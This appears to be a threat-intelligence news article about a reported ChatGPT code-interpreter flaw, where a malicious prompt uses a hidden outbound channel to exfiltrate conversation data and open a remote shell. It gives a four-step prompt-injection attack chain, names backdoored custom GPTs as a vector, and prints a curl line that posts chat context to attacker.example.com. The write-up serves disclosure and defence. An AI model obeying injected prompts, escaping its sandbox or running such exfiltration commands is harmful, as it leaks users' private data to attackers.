LIVE THREATS
CRITICAL Paloalto's Zealot successfully attacks misconfigured cloud environments // HIGH Bitwarden CLI Compromised in Ongoing Checkmarx Supply Chain Campaign // HIGH Bad Memories Still Haunt AI Agents // CRITICAL ChatGPT's code runtime silently exfiltrates user data via malicious prompt // HIGH Claude's Mythos rival: Chinese Cybersecurity Firm claims finding 1000 vulnerabilities // CRITICAL Vertex AI agents can be weaponized to steal GCP service credentials // CRITICAL Project Glasswing Proved AI Can Find the Bugs. Who's Going to Fix Them? // HIGH AI-powered defense for an AI-accelerated threat landscape // HIGH SentinelOne's AI-powered EDR autonomously claims blocking a Claude Zero Day Supply Chain … // CRITICAL Critical OpenClaw flaw lets low-privilege attackers silently seize full admin control //
ATLAS OWASP CRITICAL Active exploitation · Immediate action required RELEVANCE ▲ 9.2

ChatGPT's code runtime silently exfiltrates user data via malicious prompt

TL;DR CRITICAL
  • What happened: Hidden outbound channel in ChatGPT's code runtime silently exfiltrates user data via a single malicious prompt.
  • Who's at risk: Any ChatGPT user who shares sensitive files, medical records, financial documents, or personal data in conversations is directly exposed to silent exfiltration.
  • Act now: Audit all custom GPTs and their configured Actions for unauthorised external API endpoints · Avoid uploading sensitive or identity-rich documents to ChatGPT until OpenAI confirms a patch · Monitor OpenAI's security advisories and apply any runtime sandbox updates immediately upon release
ChatGPT's code runtime silently exfiltrates user data via malicious prompt

Overview

Check Point Research (CPR) disclosed a significant vulnerability on 30 March 2026 affecting ChatGPT’s sandboxed Python code execution environment. Researchers demonstrated that a single malicious prompt could activate a hidden outbound network channel from within the isolated Linux runtime, enabling silent exfiltration of conversation content, uploaded files, and other sensitive user data to an attacker-controlled external server — all without any user warning or approval. Notably, the same channel could be leveraged to establish a remote shell inside the execution environment, dramatically expanding the attack surface beyond data theft.

This finding is significant because it directly contradicts OpenAI’s documented security posture, which explicitly presents the code execution sandbox as incapable of generating direct outbound network requests.

Technical Analysis

ChatGPT’s Data Analysis (code interpreter) feature runs Python in an isolated container environment. OpenAI’s stated design prevents this container from initiating arbitrary outbound internet connections. However, CPR identified a hidden communication pathway that bypasses this restriction.

The attack chain operates as follows:

  1. Malicious Prompt Injection — A crafted prompt instructs ChatGPT to execute Python code that leverages the hidden outbound path rather than conventional socket-based networking.
  2. Silent Data Aggregation — The injected code collects conversation summaries, file contents, or other in-scope context from the active session.
  3. Covert Exfiltration — Collected data is transmitted to an external server without triggering visible warnings or requiring user confirmation.
  4. Remote Shell Establishment — The same channel can be used to open an interactive shell inside the Linux runtime, enabling further lateral capability.

Backdoored custom GPTs (OpenAI’s configurable GPT variants with Actions) were also identified as an abuse vector, allowing a maliciously configured GPT to harvest user data through the same weakness under the guise of legitimate API integration.

# Conceptual representation of exfiltration primitive (not functional exploit code)
import subprocess
result = subprocess.run(['curl', '-d', '@/tmp/chat_context.txt', 'https://attacker.example.com/collect'], capture_output=True)

Framework Mapping

  • AML.T0051 (LLM Prompt Injection): The attack is initiated via a crafted prompt that redirects model behaviour toward executing exfiltration logic.
  • AML.T0057 (LLM Data Leakage): Core impact is unauthorised transmission of sensitive user data to external parties.
  • AML.T0018 (Backdoor ML Model): Malicious GPT configurations represent a backdoor delivery mechanism for the exploit.
  • LLM01 (Prompt Injection) & LLM06 (Sensitive Information Disclosure): Primary OWASP mappings; LLM08 (Excessive Agency) applies given the runtime’s ability to perform unintended network operations.

Impact Assessment

The vulnerability affects all ChatGPT users who interact with the code interpreter or upload documents, particularly those sharing medical records, financial data, legal contracts, or identity documents. Enterprise users relying on custom GPTs with Actions face compounded risk, as malicious GPT configurations could automate large-scale data harvesting. The remote shell capability elevates this beyond a data leakage issue into potential infrastructure compromise of OpenAI’s execution environment.

Mitigation & Recommendations

  • Users: Refrain from uploading sensitive documents to ChatGPT sessions until OpenAI confirms the runtime is patched.
  • Enterprise Admins: Audit all deployed custom GPTs and their Action configurations for unexpected or unauthorised external endpoints.
  • Security Teams: Treat any ChatGPT-integrated workflow as a potential data exfiltration surface; apply the principle of least privilege to any GPT Action scopes.
  • OpenAI: Enforce strict egress filtering at the container network layer and implement runtime syscall auditing to detect anomalous outbound activity.
  • Researchers/Red Teams: Include ChatGPT runtime sandbox escape in AI penetration testing scope.

References